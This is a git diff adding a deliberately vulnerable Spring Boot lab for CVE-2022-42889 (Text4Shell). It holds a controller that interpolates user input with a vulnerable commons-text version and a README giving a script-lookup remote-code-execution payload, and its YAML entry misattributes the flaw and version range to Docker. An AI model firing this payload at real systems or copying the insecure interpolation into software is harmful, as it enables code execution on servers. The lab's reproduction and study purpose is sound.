diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..a31999b91fab071fdfe928817bef173cc5e7aab7 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/Dockerfile @@ -0,0 +1,18 @@ +# Use an official OpenJDK runtime as a parent image +FROM openjdk:8-jre-alpine + +# set shell to bash +# source: https://stackoverflow.com/a/40944512/3128926 +RUN apk update && apk add bash + +# Set the working directory to /app +WORKDIR /app + +# Copy the fat jar into the container at /app +COPY /target/text4shell-poc.jar /app + +# Make port 8080 available to the world outside this container +EXPOSE 8080 + +# Run jar file when the container launches +CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md new file mode 100644 index 0000000000000000000000000000000000000000..2452d91ef4a4b8017f11eca516c251d4419c058e --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/README.md @@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml new file mode 100644 index 0000000000000000000000000000000000000000..800842586bfdaaad3e9c489d49b4a584135674c2 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java new file mode 100644 index 0000000000000000000000000000000000000000..d1d037bffd167242f77959c9f5c918601d3934f6 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java @@ -0,0 +1,11 @@ +package com.levo.dockerexample; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class DockerApp { + public static void main(String[] args) { + SpringApplication.run(DockerApp.class, args); + } +} diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java new file mode 100644 index 0000000000000000000000000000000000000000..b4fa1922a297fcf6ce5f0dd992aa8193b7adf6fd --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java @@ -0,0 +1,30 @@ +package com.levo.dockerexample.controller; + +import java.util.Date; + +import org.apache.commons.text.StringSubstitutor; + +import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.RestController; + +@RestController +@RequestMapping("text4shell") +public class HelloController { + + @RequestMapping(value = "/attack", method = RequestMethod.GET) + @ResponseBody + public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { + StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); + // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}"; + try{ + String pwn = interpolator.replace(search); + } catch(Exception e) { + System.out.println(e); + } + return "Search results for: " + search; + } + +} diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java new file mode 100644 index 0000000000000000000000000000000000000000..300beb32648e704866ef08ba54a8f36c972c973e --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java @@ -0,0 +1,5 @@ +package com.levo.dockerexample; + +public class PlaceHolderForTest { + +} diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml new file mode 100644 index 0000000000000000000000000000000000000000..5672cca76c55bc8c01d04e91225684820271e2cb --- /dev/null +++ b/cve/docker/2022/yaml/cve-2022-42889.yaml @@ -0,0 +1,20 @@ +id: cve-2022-42889 +source: + https://github.com/karthikuj/cve-2022-42889-text4shell-docker +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: CRITICAL + description: | + Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。 + scope-of-influence: + Docker 1.5-1.10.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: cve-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: Docker,cve2022 \ No newline at end of file